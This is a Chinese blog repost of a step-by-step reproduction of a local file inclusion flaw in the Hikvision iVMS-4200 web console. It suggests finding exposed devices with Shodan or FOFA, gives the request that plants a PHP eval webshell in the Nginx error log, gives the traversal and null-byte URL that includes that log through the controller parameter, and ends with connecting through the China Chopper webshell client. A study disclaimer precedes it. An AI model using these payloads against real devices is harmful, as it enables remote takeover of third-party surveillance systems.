首页 > Web开发 > 详细

Hikvision iVMS 4200 /index.php 本地文件包含漏洞复现

时间:2020-10-15 16:15:12      阅读:115      评论:0      收藏:0      [点我收藏+]

声明

本文内容仅供学习交流使用,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。


 

一、漏洞介绍

iVMS-4200适用于嵌入式网络硬盘录像机、混合型网络硬盘录像机、网络视频服务器、NVR、IP Camera和解码设备以及视音频编解码卡,支持实时预览、远程回放和下载、资源管理、远程配置、用户管理、系统配置等多种功能。

技术分享图片

简单来说,它包含了一个WEB版的控制台,用到了一个比较小众的框架,然后被这个Xphp的框架卖了。

漏洞出现在controller参数的一个任意文件包含。

二、查找设备

利用shodan、FOFA等查找iVMS-4200的设备

技术分享图片

技术分享图片

 

 三、漏洞复现

1、首先构造URL访问,使其记录在error.log中

http://xxx.xxx.xxx.xxx:xx/<?eval($_POST[‘pass‘])?>

技术分享图片

 

2、 直接包含这个客户端自带的Nginx日志文件

http://xxx.xxx.xxx.xxx:xx/index.php?controller=../../../../Server/logs/error.log%00.php 

(此处不截图,自行测试查看)

3、中国菜刀连接

技术分享图片

Hikvision iVMS 4200 /index.php 本地文件包含漏洞复现

原文:https://www.cnblogs.com/charon1937/p/13819747.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!